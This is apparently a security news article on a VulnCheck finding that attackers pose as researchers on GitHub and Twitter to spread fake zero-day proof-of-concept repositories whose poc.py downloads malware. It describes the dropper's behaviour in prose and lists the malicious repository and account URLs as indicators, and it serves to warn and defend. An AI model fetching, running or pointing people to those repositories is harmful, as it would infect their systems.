Hackers have been found to be impersonating cybersecurity researchers on social platforms like Twitter and GitHub. This emerging trend was recently identified by the cybersecurity researchers at VulnCheck. These hackers are using this disguise to spread fake proof-of-concept exploits for zero-day vulnerabilities, which can infect both Windows and Linux operating systems.
One group of alleged experts who are actively involved in this malicious campaign is affiliated with a fraudulent cybersecurity company called ‘High Sierra Cyber Security’. They are creating repositories on platforms like GitHub that appear legitimate, with the individuals responsible for them pretending to be security experts from renowned companies like ‘Rapid7’. To add to the deception, they are even using the pictures of these security professionals.
To give their repositories more credibility, these hackers also create and manage Twitter accounts. Through social media, they try to lure unsuspecting victims into their traps. This malicious campaign has been ongoing since May 2023, and the hackers are promoting zero-day vulnerabilities in popular apps such as Chrome, Discord, Signal, WhatsApp, and Microsoft Exchange.
In each instance, the malicious repositories contain a Python script named ‘poc.py’, which serves as a means of downloading malware onto targeted systems. The script connects with a specific website to retrieve a ZIP file, which is then downloaded onto the victim’s computer. The choice of the ZIP file depends on the operating system in place. Linux and Windows users receive different files with different names.
The malware is stored in specific directories on the infected systems. For Windows users, the malware is stored in ‘%Temp%’, while for Linux users, it is stored in ‘/home//.local/share’. The Windows binary raises concerns among more than 60% of antivirus engines on VirusTotal, indicating its potential risk. On the other hand, the Linux binary shows a greater level of stealthiness, managing to evade detection from most scanners.
The exact nature of the installed malware remains uncertain, but both executables install a TOR client. Additionally, the Windows edition is recognized as a trojan with the ability to steal passwords.
To protect users from falling victim to these malicious repositories and Twitter accounts, it is important to know which ones to avoid. Here are the repositories and Twitter accounts that should be avoided:
Malicious Repositories:
– https://github.com/AKuzmanHSCS/Microsoft-Exchange-RCE
– https://github.com/MHadzicHSCS/Chrome-0-day
– https://github.com/GSandersonHSCS/discord-0-day-fix
– https://github.com/BAdithyaHSCS/Exchange-0-Day
– https://github.com/RShahHSCS/Discord-0-Day-Exploit
– https://github.com/DLandonHSCS/Discord-RCE
– https://github.com/SSankkarHSCS/Chromium-0-Day
Fake Twitter Accounts:
– https://twitter.com/AKuzmanHSCS
– https://twitter.com/DLandonHSCS
– https://twitter.com/GSandersonHSCS
– https://twitter.com/MHadzicHSCS
Fake GitHub Accounts:
– https://github.com/AKuzmanHSCS
– https://github.com/RShahHSCS
– https://github.com/BAdithyaHSCS
– https://github.com/DLandonHSCS
– https://github.com/MHadzicHSCS
– https://github.com/GSandersonHSCS
– https://github.com/SSankkarHSCS
It is essential to exercise caution while browsing these platforms and interacting with unfamiliar accounts. Users should only download and trust files from verified and reputable sources. Taking these precautions can help protect against falling victim to malware and other cyber threats.
In conclusion, hackers are increasingly disguising themselves as cybersecurity researchers on social platforms to spread malicious exploits for zero-day vulnerabilities. Their deceptive tactics, such as creating fake GitHub and Twitter accounts, pose a significant risk to users. Recognizing and avoiding these malicious repositories and accounts is crucial to maintaining online security.